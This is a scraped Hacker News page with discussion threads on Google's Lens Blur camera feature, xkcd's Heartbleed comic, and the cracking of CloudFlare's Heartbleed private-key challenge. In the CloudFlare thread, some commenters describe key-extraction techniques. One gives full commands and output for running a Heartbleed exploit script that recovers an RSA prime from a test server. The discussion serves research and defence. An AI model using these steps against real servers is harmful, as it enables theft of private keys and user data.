I've got a Samsung Galaxy S4 Zoom, which hasn't yet gotten the Android 4.4 update, so I can't use the app itself to evaluate the Lens Blur feature, but based on the examples in the blog post, it's pretty good. It's clearly not indistinguishable from optical shallow depth of field, but it's not so bad that it's glaring. That you can adjust the focus after you shoot is icing on the cake, but tremendously delicious icing. The S4 Zoom is a really terrific point-and-shoot that happens to have a phone, so I'm excited to try it out. Even if I can use it in just 50% of the cases where I now lean on my DLSR, it'll save me from having to lug a bulky camera around AND be easier to share over wifi/data.

2
grecy 1 day ago 9 replies      
We had an interesting discussion about this a few nights ago at a Photojournalism talk.

In that field, digital edits are seriously banned, to the point multiple very well known photo journalists have been fired for one little use of the clone tool [1] and other minor edits.

It's interesting to think I can throw an f/1.8 lens on my DSLR and take a very shallow depth of field photo, which is OK, even though it's not very representative of what my eyes saw. If I take the photo at f/18 then use an app like the one linked, producing extremely similar results, that's banned. Fascinating what's allowed and what's not.

I find even more interesting is the allowance of changing color photos to B/W, or that almost anything that "came straight off the camera" no matter how far it strays from what your eyes saw.

[1] http://www.toledoblade.com/frontpage/2007/04/15/A-basic-rule...

3
DangerousPie 1 day ago 4 replies      
Isn't this just a copy of Nokia's Refocus?

https://refocus.nokia.com/

edit - better link: http://www.engadget.com/2014/03/14/nokia-refocus-camera-app-...

4
salimmadjd 1 day ago 3 replies      
Is the app taking more than one photo? It wasn't clear in the blog post. AFAIU to have any depth perception you need to take more than one photo. Calculate the pupil distance (the distance the phone moved) then match image features between the two or more images. Calculate the amount of movement between the matching features to then calculate the depth.

As described you then map the depth into an alpha transparency and then apply the blurred image with various blur strength over the original image.

Since you're able to apply the blur after the image, it would mean the google camera always takes more than one photo.

Also a Cool feature would be to animate the transition from no blur to DOF blur as a short clip or use the depth perception to apply different effect than just blur, like selective coloring, or other filters.

5
dperfect 1 day ago 5 replies      
I believe the algorithm could be improved by applying the blur to certain areas/depths of the image without including pixels from very distant depths, and instead blurring/feathering edges with an alpha channel over those distant (large depth separation) pixels.

For example, if you look at the left example photo by Rachel Been[1], the hair is blurred together with the distant tree details. If instead the algorithm detected the large depth separation there and applied the foreground blur edge against an alpha mask, I believe the results would look a lot more natural.

[1] http://4.bp.blogspot.com/-bZJNDZGLS_U/U03bQE2VzKI/AAAAAAAAAR...

6
nostromo 1 day ago 6 replies      
I sure wish you could buy a DSLR that just plugs into your iPhone. I don't want any of that terrible DSLR software -- just the hardware.

I think many devices should become BYOD (bring your own device) soon, including big things like cars.

edit: I don't just want my pictures to be saved on my phone. I'd like the phone to have full control of the camera's features -- so I can use apps (like timelapse, hdr, etc.) directly within the camera.

7
themgt 1 day ago 5 replies      
Is looking at the examples giving anyone else a headache? It's like the software blur falls into some kind of uncanny valley for reality.
8
kbrower 1 day ago 1 reply      
I did a quick comparison of a full frame slr vs moto x with this lens blur effect. I tried to match the blur amount, but made no other adjustments. Works really well compared to everything else I have seen! http://onionpants.s3.amazonaws.com/IMG_0455.jpg
9
fidotron 1 day ago 0 replies      
Doesn't look totally convincing, but it's good for a first version.

The real problem with things like this is the effect became cool by virtue of the fact it needed dedicated equipment. Take that away and the desire people will have to apply the effect will be greatly diminished.

10
sytelus 22 hours ago 2 replies      
Wow.. this is missing the entire point on why lens blur occurs. Lens blur in normal photographs is the price you pay because you want to focus sharply on a subject. The reason photos with blur looks "cool" is not because the blur itself but it's because the subject is so sharply focused that its details are order of magnitude better. If you take a random photo, calculate depth map somehow, blur out everything but the subject then you are taking away information from the photo without adding information to the subject. The photos would look "odd" to the trained eyes at best. For casual photograph, it may look slightly cool on small screens like phone because of relatively increased perceived focus on subject but it's fooling eyes of casual person. If they want to really do it (i.e. add more details to subject) then they should use multiple frames to increase resolution of the photograph. There is a lot of research being done on that. Subtracting details from background without adding details to subject is like doing an Instagram. It may be cool to teens but professional photographers know it's a bad taste.
11
Spittie 1 day ago 2 replies      
I find it funny that this was one of the "exclusive features" of the HTC One M8 thanks to the double camera, and days after its release Google is giving the same ability to every Android phone.

I'm sure the HTC implementation works better, but this is still impressive.

12
nileshtrivedi 1 day ago 3 replies      
With these algorithms, will it become feasible to make a driverless car that doesn't need a LIDAR and can run with just a few cameras?

Currently, the cost of LIDARs are prohibitive to make (or even experiment with) a DIY self-driving car.

13
scep12 1 day ago 2 replies      
Impressive feat. Took a few snaps on my Nexus 4 and it seems to work really well given a decent scene.
14
thenomad 8 hours ago 0 replies      
So, is there a way to get the depth map out of the image separately for more post-processing?

Fake DOF is nice, but there are a lot more fun things you can use a depth map for. For example, it seems like ghetto photogrammetry (turning photographs into 3D objects) wouldn't be too far away.

15
angusb 18 hours ago 0 replies      
A couple of other really cool depth-map implementations:

1) The Seene app (iOS app store, free), which creates a depth map and a pseudo-3d model of an environment from a "sweep" of images similar to the image acquisition in the article

2) Google Maps Photo Tours feature (available in areas where lots of touristy photos are taken). This does basically the same as the above but using crowdsourced images from the public.

IMO the latter is the most impressive depth-mapping feat I've seen: the source images are amateur photography from the general public, so they are randomly oriented (and without any gyroscope orientation data!), and uncalibrated for things like exposure, white balance, etc. Seems pretty amazing that Google have managed to make depth maps from that image set.

16
anigbrowl 1 day ago 0 replies      
It's interesting that the DoF is calculated in the app. I am wondering if this uses some known coefficients about smartphone cameras to save computation, but in any case I hope this depth mapping becomes available in plugin forms for Photoshop and other users.

As an indie filmmaker, it would save a lot of hassle to be able to shoot at infinity focus all the time and apply bokeh afterwards; of course an algorithmic version would likely never get close to what you can achieve with quality optics, but many situations where image quality is 'good enough' for artistic purposes (eg shooting with a video-capable DSLR) then faster is better.

17
jnevelson 1 day ago 1 reply      
So Google basically took what Lytro has been using hardware to achieve, and did it entirely in software. Pretty impressive.
18
frenchman_in_ny 1 day ago 2 replies      
Does this pretty much blow Lytro out of the water, and mean that you no longer need dedicated hardware to do this?
19
tdicola 23 hours ago 0 replies      
Neat effect--I'm definitely interested in trying this app. Would be cool to see them go further and try to turn highlights in the out of focus areas into nice octagons or other shapes caused by the aperture blades in a real camera.
20
gamesurgeon 1 day ago 2 replies      
One of the greatest features is the ability to change your focus point AFTER you shoot. This is huge.
21
mauricesvay 1 day ago 0 replies      
The interesting part is not that it can blur a part of the image. The interesting part is that it can generate a depth map automatically from a series of images taken from different points of view, using techniques used in photogrammetry.
22
kingnight 1 day ago 1 reply      
I'd like to see an example of a evening/night shot using this. I can't imagine the results are anything like the examples here, but would love to be surprised.

Are there more samples somewhere?

23
spot 1 day ago 0 replies      
i just noticed i have the update and i tried it out. wow, first try. amazing: https://plus.google.com/+ScottDraves/posts/W4ozBLTBmKy
24
jestinjoy1 1 day ago 1 reply      
This is what i got with Moto G Google Camera App http://i.imgur.com/a6AxO4e.jpg
25
goatslacker 1 day ago 0 replies      
On iOS you can customize your DoF with an app called Big Lens.

Normally apps like Instagram and Fotor let you pick one point in the picture or a vertical/horizontal segment and apply focus there while blurring the background. Big Lens is more advanced since it lets you draw with your finger what you'd like to be in focus.

They also include various apertures you can set (as low as f/1.8) as well as some filters -- although I personally find the filters to be overdone but others might find them tasteful.

26
bckrasnow 1 day ago 1 reply      
Well, the Lytro guys are screwed now. They're selling a $400 camera with this feature as the main selling point.
27
Lutin 1 day ago 0 replies      
This app is now on the Play Store and works with most phones and tablets running Android 4.4 KitKat. Unfortunately it seems to crash on my S3 running CM 11, but your experience may vary.

https://play.google.com/store/apps/details?id=com.google.and...

28
defdac 1 day ago 0 replies      
Is this related to the point cloud generation feature modern compositing programs use, like Nuke? Example/tutorial video: http://vimeo.com/61463556 skip to 10:27 for magic
29
insickness 1 day ago 1 reply      
> First, we pick out visual features in the scene and track them over time, across the series of images.

Does this mean it needs to take multiple shots for this to work?

30
Splendor 1 day ago 0 replies      
Isn't the real story here that Google is continuing to break off core pieces of AOSP and offer them directly via the Play Store?
31
zmmmmm 1 day ago 0 replies      
If nothing else, these improvements make HTC's gimmick of adding the extra lens while giving up OIS seem all the more silly.
32
mcescalante 1 day ago 3 replies      
I may be wrong because I don't know much about image based algorithms, but this seems to be a pretty successful new approach to achieving this effect. Are there any other existing "lens blur" or depth of field tricks that phone makers or apps are using?

I'd love to see their code open sourced.

33
marko1985 16 hours ago 0 replies      
Happy for this "invention" but I would wait for this kind of stuff when smartphones will have all their laser sensors for depth measurement, so these calculations don't require a sequence of taken pictures, as the main character could move quickly and deform the final picture or the blur effect. But for static photography or selfies looks amazing.
34
jheriko 1 day ago 0 replies      
This sounds clever but also massively complex for what it does. I don't have anything finished but I can think of a few approaches to this without needing to reconstruct 3d things with clever algorithms... still very neat visually if technically underwhelming
35
techaddict009 1 day ago 0 replies      
Just installed it. Frankly speaking I loved the new app!
36
anoncow 1 day ago 1 reply      
How is Nokia Refocus similar or different to this? It allows refocusing a part of the image which blurs out the rest. (Not a pro) https://refocus.nokia.com/
37
guardian5x 1 day ago 1 reply      
I guess that is exactly the same as Nokias Refocus that is on the Lumia Phones for quite some time: https://refocus.nokia.com/
38
the_cat_kittles 1 day ago 1 reply      
Isn't it interesting how, by diminishing the overall information content of the image by blurring it, it actually communicates more (in some ways, particularly depth) to the viewer?
39
CSDude 1 day ago 0 replies      
I wonder what is the exact reason that my country is not included. It is just a fricking camera app.
40
coin 1 day ago 0 replies      
Shallow depth of field is so overused these days. I much prefer having the entire frame in focus, and let me decide what to focus on. I understand the photographer is trying to emphasize certain parts of the photo, but in the end it feels too limiting. It's analogous to mobile "optimized" websites - just give me all the content and I'll choose what I want to look at.
41
ohwp 21 hours ago 0 replies      
Nice! Since they got a depth map, 3D-scanning can be a next step.
42
benmorris 1 day ago 0 replies      
The app is fast on my nexus 5. The lens blur feature is really neat. I've taken some pictures this evening and they have turned out great. Overall a nice improvement.
43
thomasfl 17 hours ago 0 replies      
I wish google camera gets ported to iOS. The best alternative for iOS seems to be the "Big Lens" app, where you have to manually create a mask to specify the focused area.
44
sivanmz 1 day ago 0 replies      
It's a cool gimmick that would be useful for Instagram photos of food. But selfies will still be distorted when taken up close with a wide angle lens.

It would be interesting to pair this with Nokia's high megapixel crop-zoom.

45
dharma1 1 day ago 0 replies      
the accurate depth map creation from 2 photos on a mobile device is impressive. The rest has been done many times before

This is cool, but I am waiting more for RAW images exposed in Android camera API. Will be awesome to do some cutting edge tonemapping on 12bits of dynamic range that the sensor gives, which is currently lost.

46
bitJericho 1 day ago 0 replies      
If you couple this with instagram does it break the cosmological fabric?
47
spyder 1 day ago 0 replies      
But it can be used only on static subjects because it needs series of frames for depth.
48
servowire 1 day ago 3 replies      
I'm no photographer, but I was taught this was called bokeh not blur. Blur is more because of motion during open shutter.
49
matthiasb 1 day ago 0 replies      
I don't see this mode. I have a Note 3 from Verizon. Do you?
50
avaku 1 day ago 0 replies      
So glad I did the Coursera course on Probabilistic Graphical Models, so I totally have an understanding of how this is done when they mention Markov Random Field...
51
DanielBMarkham 1 day ago 0 replies      
Lately I've been watching various TV shows that are using green screen/composite effects. At times, I felt there was some kind of weird DOF thing going on that just didn't look right.

Now I know what that is. Computational DOF. Interesting.

Along these lines, wasn't there a camera technology that came out last year that allowed total focus/DOF changes post-image-capture? It looked awesome, but IIRC, the tech was going to be several years until released.

ADD: Here it is. Would love to see this in stereo 4K: http://en.wikipedia.org/wiki/Lytro The nice thing about this tech is that in stereo, you should be able to eliminate the eyeball-focus strain that drives users crazy.

52
apunic 23 hours ago 0 replies      
Game changer
53
alexnewman 1 day ago 0 replies      
Got me beat
54
seba_dos1 1 day ago 0 replies      
Looks exactly like "shallow" mode of BlessN900 app for Nokia N900 from few years ago.

It's funny to see how most of the "innovations" in mobile world presented today either by Apple or Google was already implemented on open or semi-open platforms like Openmoko or Maemo few years before. Most of them only as experiments, granted, but still shows what the community is capable of on its own when not putting unnecessary restrictions on it.

55
sib 1 day ago 2 replies      
If only they had not confused shallow depth of field with Bokeh (which is not the shallowness of the depth of field, but, rather, how out-of-focus areas are rendered), this writeup would have been much better.

http://en.wikipedia.org/wiki/Bokeh

Cool technology, though.

4
Xkcd: Heartbleed Explanation xkcd.com
528 points by MattBearman  6 days ago   75 comments top 12
1
billpg 6 days ago 2 replies      
I showed this to my wife to see if the cartoon worked with an educated but not-technical person. She subconsciously glossed over the (n LETTERS) part of Meg's requests as just an annotation on the cartoonist's part, not realizing that it was actually part of the request.

Once I rephrased the final request as "Server, reply with the 500 letters of HAT", we finally had that light-bulb moment.

2
nyellin 6 days ago 3 replies      
This is why xkcd is unique - not because of the puns or nerdy references, but because of Randall's ability to make complicated issues simple.
3
StavrosK 6 days ago 2 replies      
Nice easter egg in the user who wants to change the password to CoHoBaSt (correct-horse-battery-staple).
4
mixedbit 6 days ago 1 reply      
Security issue explained without Alice, Bob and Malory, this is way too confusing. Who is this Meg character?
5
AndrewDucker 6 days ago 6 replies      
Can someone explain why Heartbeat needed to return the text it was sent, rather than always returning an "OK" message?

What advantage does returning the text give you?

6
weavie 6 days ago 5 replies      
Wow. Was it really that simple? The heart beat request sends the text as well as the length it wants back?
7
damon_c 6 days ago 0 replies      
It's hard to believe that even with all of our slavish mantra repetition about not trusting user submitted data... the freaking web server trusts user submitted data.

We're all going to have to start reading more source code...

8
parax 6 days ago 0 replies      
"And this is, kids, why you always have to validate your input and do not trust on the user".
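The comic's "reply with HAT (500 letters)" request and the missing length check the comments above describe, as an added C example. It is not OpenSSL's code and not from the thread; the `memory` buffer, the `SECRET` string and all function names are constructed for illustration, and the response omits the padding a real heartbeat reply carries.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_HEADER   3    /* 1-byte type + 2-byte claimed payload length */
#define HB_PADDING  16   /* minimum padding required by RFC 6520 */

/* Constructed data: stands in for whatever sits next to the record in memory. */
static const char SECRET[] = "session=constructed-secret-value";

/* Constructed stand-in for the server heap: [heartbeat record][SECRET][zeros]. */
static uint8_t memory[1024];
static size_t record_len;

/* Place a "HAT" request at the start of memory with an arbitrary claimed length. */
void setup_memory(uint16_t claimed_len)
{
    static const char payload[] = "HAT";
    size_t actual = sizeof payload - 1;

    memset(memory, 0, sizeof memory);
    memory[0] = HB_REQUEST;
    memory[1] = (uint8_t)(claimed_len >> 8);
    memory[2] = (uint8_t)(claimed_len & 0xff);
    memcpy(memory + HB_HEADER, payload, actual);
    record_len = HB_HEADER + actual + HB_PADDING;  /* padding is already zero */
    memcpy(memory + record_len, SECRET, sizeof SECRET - 1);
}

static uint16_t claimed_length(const uint8_t *rec)
{
    return (uint16_t)((rec[1] << 8) | rec[2]);
}

/* Pre-fix logic: echoes as many bytes as the request claims and never looks
 * at rec_len. The out_cap test only keeps this demo inside `memory` (call it
 * with rec == memory and out_cap <= sizeof memory); it is not a fix. */
size_t respond_trusting(const uint8_t *rec, size_t rec_len,
                        uint8_t *out, size_t out_cap)
{
    uint16_t claimed = claimed_length(rec);
    (void)rec_len;
    if (rec[0] != HB_REQUEST || (size_t)HB_HEADER + claimed > out_cap)
        return 0;
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + HB_HEADER, rec + HB_HEADER, claimed);  /* reads past the record */
    return (size_t)HB_HEADER + claimed;
}

/* Hardened logic: the claimed length must fit inside the bytes that actually
 * arrived, otherwise the message is dropped without a reply (RFC 6520
 * requires silently discarding a message whose payload_length is too large). */
size_t respond_checked(const uint8_t *rec, size_t rec_len,
                       uint8_t *out, size_t out_cap)
{
    uint16_t claimed;
    if (rec_len < HB_HEADER + HB_PADDING || rec[0] != HB_REQUEST)
        return 0;                       /* too short to be a heartbeat */
    claimed = claimed_length(rec);
    if ((size_t)HB_HEADER + claimed + HB_PADDING > rec_len)
        return 0;                       /* claims more than was sent */
    if ((size_t)HB_HEADER + claimed > out_cap)
        return 0;
    out[0] = HB_RESPONSE; out[1] = rec[1]; out[2] = rec[2];
    memcpy(out + HB_HEADER, rec + HB_HEADER, claimed);
    return (size_t)HB_HEADER + claimed;
}

/* Returns 1 if the constructed SECRET appears anywhere in buf[0..n). */
int contains_secret(const uint8_t *buf, size_t n)
{
    size_t k = sizeof SECRET - 1;
    for (size_t i = 0; i + k <= n; i++)
        if (memcmp(buf + i, SECRET, k) == 0)
            return 1;
    return 0;
}

int main(void)
{
    uint8_t out[1024];
    size_t n;

    setup_memory(500);                  /* "HAT (500 letters)" */
    n = respond_trusting(memory, record_len, out, sizeof out);
    printf("trusting: %zu bytes, secret leaked: %d\n", n, contains_secret(out, n));
    n = respond_checked(memory, record_len, out, sizeof out);
    printf("checked:  %zu bytes (0 = discarded)\n", n);
    return 0;
}
```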
9
yiedyie 6 days ago 0 replies      
10
danyork 6 days ago 0 replies      
Brilliantly done! Great to have this out there to help explain the issue to non-developers.
11
spbhat1989 6 days ago 0 replies      
Xkcd is best at simplifying the most complex things and complicating the most simple things! :)
12
nashashmi 6 days ago 1 reply      
I just began appreciating all the hoops I jump through just to concentrate on things hardly anyone else cares about. It takes me nearly ten times as long to complete a program, and taxes my mind ten times more, and makes me frustrated twice as much about pursuing programming, but after a very sharp practicing curve, makes me hundred times better than the rest of the programmers out there. But, still, I wonder if it's worth it. Especially, considering my boring as hell job.
5
CloudFlare's Heartbleed challenge cracked twitter.com
523 points by jmduke  6 days ago   142 comments top 23
1
nikcub 6 days ago 4 replies      
Reading Cloudflare's blog post[0], they keep referring to the exploit having a length of 65,536 bytes, and how an allocation of that size is unlikely to find itself lower in the heap.

That is true - but this exploit doesn't depend on setting a length of 65,536. The server takes whatever length the client gives it (which is, after all, the bug). Most of the early exploits just happen to set the maximum packet size to get as much data out (not realizing the nuances of heap allocation). You can set a length of 8 bytes or 16 bytes and get allocated in a very different part of the heap.

The metasploit module for this exploit[1] supports varied lengths. Beating this challenge could have been as simple as running it with short lengths repeatably and re-assembling the different parts of the key as you find it.

edit something that I want to sneak in here since I missed the other threads. Cloudflare keep talking about how they had the bug 12 days early. Security companies and vendors have worked together to fix bugs in private for years, but this is the first time i've ever seen a company brag about it or put a marketing spin on it. It isn't good - one simple reason why: other security companies will now have to compete with that, which forces companies not to co-operate on bugs (we had the bug 16 days early, no we had the bug 18 days early!, etc.).

As users you want vendors and security companies co-operating, not competing at that phase.

[0] Cloudflare - Can You Get Private SSL Keys Using Heartbleed? http://blog.cloudflare.com/answering-the-critical-question-c...

[1] see https://github.com/rapid7/metasploit-framework/blob/master/m...

2
tptacek 6 days ago 4 replies      
3
d0ne 6 days ago 1 reply      
We have reached out via twitter to this individual as to coordinate the delivery of the $10,000 bounty we offered. If anyone is already in contact with them please direct them to https://news.ycombinator.com/item?id=7572530
4
danielpal 6 days ago 2 replies      
The important thing to know here is that you not only have to change your current certs you ALSO HAVE TO REVOKE THE OLD ONE.

If you only change your current cert to get a new key but you don't go through the revocation process of the old certificate if someone managed to get the old one they can still use it for a MiTM attack - as both certs would be valid to any client.

5
ig1 5 days ago 1 reply      
So I didn't manage to crack the challenge (I used around 10k heartbeats), but I suspect it may have just been a case of brute-force (i.e asking for enough heartbleeds). Other people may have got the key without realizing that had done so because they were looking for the wrong thing (i.e. normal cert text representation).

I took the approach of using two fingerprints to search the data:

1) The hex sequence "30 82 .. .. 02 01 00" which would indicate the ASN.1 private key encoding which OpenSSL uses.

2) The modulus which I extracted from the public key (which would also be in the private key structure)

I didn't find any instance of the first, the second I found lots of instances of (because the modulus is also in the public key). I then filtered out all the instances of the public key by searching for the public key header ("30 82 .. .. 30 82").

This actually left me with two unique instances of the modulus in memory which weren't in a public key structure. I then tried to overlay the private key structure over the data and extracted what should have been the prime numbers and ran a primality test on them (to verify; another way would have been to just feed the structure into openssl). Both failed, so it wasn't the private key structure.

But there's a reasonable chance that those two instances represented a cryptographic calculation in progress; so while recovering the key wouldn't be as trivial as if you grabbed the full private key structure from memory (which I suspect is what the successful attackers did) I think it definitely represents another attack angle.

6
tomkwok 6 days ago 3 replies      
* From https://www.cloudflarechallenge.com/heartbleed *

So far, two people have independently solved the Heartbleed Challenge.

The first was submitted at 4:22:01PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, this was approximately 30% of all the requests we saw. The second was submitted at 5:12:19PST by Illkka Mattila using around 100 thousand requests.

We confirmed that both of these individuals have the private key and that it was obtained through Heartbleed exploits. We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we can't be certain.

7
benmmurphy 5 days ago 3 replies      
i think cloudflare's version of nginx is a lucky version or my code is bugged or time after restart is important or you need to do some heap-fu by sending different payload sizes.

so i booted up a micro vm on amazon aws and was able to dump the private key in one request.

Ubuntu Server 13.10 (PV) - ami-35dbde5c

  sudo add-apt-repository ppa:nginx/development
  sudo apt-get update
  sudo apt-get install nginx
  sudo apt-get install ssl-cert

modify /etc/nginx/sites-enabled/default uncomment ssl server and change certs:

  ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
  ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
  sudo /etc/init.d/nginx restart
  curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py
  chmod u+x heartbeat.py
  ubuntu@ip-10-185-20-243:~$ ./heartbeat.py localhost /etc/ssl/certs/ssl-cert-snakeoil.pem
  Using modulus
  Using key size: 128
  Scanning localhost on port 443
  Connecting...
  Sending Client Hello...
  Waiting for Server Hello...
  Got length: 66
   ... received message: type = 22, ver = 0302, length = 66
  Message Type is 0x02
  Got length: 750
   ... received message: type = 22, ver = 0302, length = 750
  Message Type is 0x0B
  Got length: 331
   ... received message: type = 22, ver = 0302, length = 331
  Message Type is 0x0C
  Got length: 4
   ... received message: type = 22, ver = 0302, length = 4
  Message Type is 0x0E
  Server sent server hello done
  Server TLS version was 1.2
  Sending heartbeat request...
  Got length: 16384
   ... received message: type = 24, ver = 0302, length = 65551
  Received heartbeat response:
  Got result: 154948185083822336433702373602285084550034029190596792283600073258494868382158852796844241764405565518400264295279959791461705192749666707538790201985451035410116800023040704455951541838840288378897688943017357577574672157589664822948047455855119173651635078033464041188274590174256703712210173285385390714209
  found prime: 0xdca74e63a186d60a9de3c8211e21a5b165c6d86d285c1d6eece2ad7a2505890ebae513e3013c3602f148e2112eaa99edd8ff5922494c4db47156727f93ab0f35a298553a82dfbd91e5e8aff2e969f31db31263bce9a89d95b64ff38ff5b86d47fa2e70aac5198d2ea967eb952f48b7264e824bd03b1c955294fb9caeed02ed61L

you can check the prime by doing:

  ubuntu@ip-10-185-20-243:~$ sudo openssl rsa -in /etc/ssl/private/ssl-cert-snakeoil.key -text
  ..
  prime1:
      00:e2:4e:eb:f7:88:3a:d4:ad:61:2c:ef:6f:b2:a6:
      3b:dd:c4:99:89:f1:b4:6e:6b:ce:76:51:c3:23:f7:
      7a:37:69:f9:6c:eb:65:3d:cd:6a:f7:c9:97:96:b0:
      f6:39:72:8a:ca:f7:45:3c:ff:25:b0:dd:a9:c1:08:
      c3:aa:53:41:22:20:df:74:cb:1d:ad:ce:67:1d:11:
      00:15:33:65:1f:d4:b9:a8:2b:27:50:da:7c:a7:e1:
      88:d1:2c:d8:d9:32:07:ba:23:e1:40:fa:fa:94:46:
      7f:9b:35:a1:d2:e4:91:86:f6:f3:79:2f:53:fd:95:
      4d:99:56:b3:c0:be:97:6b:43
  prime2:
      00:dc:a7:4e:63:a1:86:d6:0a:9d:e3:c8:21:1e:21:
      a5:b1:65:c6:d8:6d:28:5c:1d:6e:ec:e2:ad:7a:25:
      05:89:0e:ba:e5:13:e3:01:3c:36:02:f1:48:e2:11:
      2e:aa:99:ed:d8:ff:59:22:49:4c:4d:b4:71:56:72:
      7f:93:ab:0f:35:a2:98:55:3a:82:df:bd:91:e5:e8:
      af:f2:e9:69:f3:1d:b3:12:63:bc:e9:a8:9d:95:b6:
      4f:f3:8f:f5:b8:6d:47:fa:2e:70:aa:c5:19:8d:2e:
      a9:67:eb:95:2f:48:b7:26:4e:82:4b:d0:3b:1c:95:
      52:94:fb:9c:ae:ed:02:ed:61
  ..

so the exploit is the most stupid one possible. i took the POC code and changed it to read all 64k. The version i had was reading only 14kb from the server. Then just check all the 128 byte strings to see if they divide the modulus evenly.

8
guelo 6 days ago 2 replies      
"We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we can't be certain.". https://www.cloudflarechallenge.com/heartbleed

That doesn't make sense to me, seems like the key needs to be in memory all the time, or at least during every session.

9
alexkus 5 days ago 0 replies      
Didn't have any spare time to have a go at this, here's how I was going to do it:-

1) Create a VM with the same version of Linux, nginx, openssl.

2) Create a self-signed SSL certificate for the server

3) Verify that the HTTPS server is vulnerable to heartbleed

4) Run a few HTTPS requests against the server

5) Use gcore (or just send SIGABRT) to get a core file of the nginx process

6) Write a tool to check the memory image for remnants of the private key (since I know what it looks like). This may be encoded in several forms: as is from the ssl key file, hex encoded modulus, binary encoded modulus, however the BigNum stuff in OpenSSL stores the modulus, intermediate values used in calculations, etc. I can also check for partial matches since I know what the full key looks like.

7) Run the heartbleed client against the site to extract some chunks of memory, there are various strategies for this:-

a) Repeatedly grab the largest (65535) bytes of memory each time

b) Repeatedly grab different sizes (8KB, 16KB, etc) depending on the bucket sizes for OpenSSL's freelist wrapper around malloc.

c) Vary the request size (lots more headers, etc) to try and get different chunks of memory returned.

d) Occasionally restart nginx

8) Once I can reliably (for whatever value of reliably that is) get the key from my own server, I then modify the test for success from a comparison against the known private key, to a test which involves decrypting a string that was the result of encrypting some known plaintext with the known public key. That'll be slower, but still possible.

9) Run that analysis against real data retrieved from the challenge server. The data (using the various strategies in #7) can be obtained in the background whilst I'm developing #1-#8. You can't rely on having sole access to the server so whatever strategy you use may be perturbed by other people performing requests.

10) Repeat #1-#8 for Apache and any other web server that is vulnerable to heartbleed.

This does work on the assumption that the key (in whatever form it is in) will be returned as a contiguous block of memory. Trying to patch together chunks of memory to look for the key will be much much harder unless there's significant overlap and it's easy to detect what/where a key is somehow.
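
The memory check the two comments above describe (test every key-sized window against the public modulus, and, on a server you control, search a core file for the key you already know), as an added example that is not part of any comment here and is not the linked heartbeat.py. The function names and the toy 256-bit modulus are constructed for illustration; a 2048-bit key like the one in the thread has 128-byte primes, so `prime_len` would be 128.

```python
"""Audit a memory image for RSA private-key remnants (added example)."""
from typing import Iterator, List, NamedTuple


class Hit(NamedTuple):
    offset: int   # byte offset of the match inside the image
    layout: str   # byte layout the value was found in
    value: int    # the prime factor that was found


def known_key_hits(image: bytes, prime: int) -> List[Hit]:
    """Search for a prime we already know (our own key) in each storage form."""
    size = (prime.bit_length() + 7) // 8
    forms = {
        "big-endian": prime.to_bytes(size, "big"),        # DER / key-file body
        "little-endian": prime.to_bytes(size, "little"),  # BIGNUM words on x86
        "hex-ascii": format(prime, "x").encode(),         # textual dumps
    }
    hits = []
    for layout, needle in forms.items():
        start = image.find(needle)
        while start != -1:
            hits.append(Hit(start, layout, prime))
            start = image.find(needle, start + 1)
    return sorted(hits)


def factor_scan(image: bytes, modulus: int, prime_len: int) -> Iterator[Hit]:
    """Blind check that needs only the public modulus.

    Slides a prime_len-byte window over the image and yields every window
    that, read as an integer, divides the modulus evenly.
    """
    min_bits = 8 * (prime_len - 1)
    for offset in range(len(image) - prime_len + 1):
        window = image[offset:offset + prime_len]
        for order in ("little", "big"):
            cand = int.from_bytes(window, order)
            # A prime factor is odd and fills the whole window, so
            # everything else is skipped before the expensive division.
            if cand & 1 == 0 or cand.bit_length() <= min_bits:
                continue
            if 1 < cand < modulus and modulus % cand == 0:
                yield Hit(offset, order + "-endian", cand)


# Constructed sample: a toy 256-bit modulus built from two well-known
# 128-bit primes, planted in filler bytes. Not real key material and not
# data from the thread.
P = 2**127 - 1
Q = 2**128 - 159
N = P * Q
FILLER = bytes(range(1, 251))
IMAGE = (FILLER + P.to_bytes(16, "little") + FILLER[:37]
         + Q.to_bytes(16, "big") + FILLER)


if __name__ == "__main__":
    for hit in factor_scan(IMAGE, N, 16):
        print(f"factor of N at offset {hit.offset} ({hit.layout}): {hit.value:#x}")
    for hit in known_key_hits(IMAGE, P):
        print(f"known prime at offset {hit.offset} ({hit.layout})")
```

Run against a core file from a test server, a non-empty result from either function means private-key material was resident in that memory, and the key should be treated as exposed and rotated.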

10
ademarre 6 days ago 4 replies      
https://twitter.com/eastdakota/status/454792635279220737

Pic of the CloudFlare team reviewing the attack. Ten guys crowded around one monitor.

11
aboodman 6 days ago 0 replies      
It probably took longer to compose that blog post than it took @indutny to disprove it.
12
nodesocket 6 days ago 1 reply      
Love to see a post on how it was done and the tools he used.
13
wrs 6 days ago 0 replies      
Well, so much for wishful thinking.
14
tszming 6 days ago 1 reply      
So @indutny sent at least 2.5 million requests, should we start to think more on the practical prevention techniques?
15
badusername 6 days ago 1 reply      
So this does mean that I need to change my passwords on every damn site on the list? Oh bollocks, those passwords were a work of art.
16
capcah 6 days ago 1 reply      
I am not sure how those guys did it, but I was talking to a friend of mine today, and I guess that it had something to do with forcing the server to use its private key to check for information sent to it. Then you use the heartbleed bug to intercept the intermediate forms on the information you sent to be decrypted/authenticated. Since you know the plaintext, the ciphertext and the intermediate forms, it should be possible to recover the key.

As I said, I am not sure that is right or if that was the method used to exploit cloudflare, as I didn't have the time nor the knowledge of openssl implementation to test it out, I am just throwing my guess out there before the official exploit comes about.

edit: formatting

17
specto 6 days ago 1 reply      
Considering he just pulled a shadow file as well, it's not pretty.
18
tectonic 6 days ago 2 replies      
Ah crap.
19
athoik 5 days ago 0 replies      
An error occurred during a connection to www.cloudflarechallenge.com. Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate)

Game over...

20
dogsky 5 days ago 0 replies      
I was unable to replicate. Can someone give more details, maybe the heartbleed script updated and some instructions to replicate it? Thanks.
21
diakritikal 6 days ago 0 replies      
Hubris is ugly.
22
yp_maplist 6 days ago 0 replies      
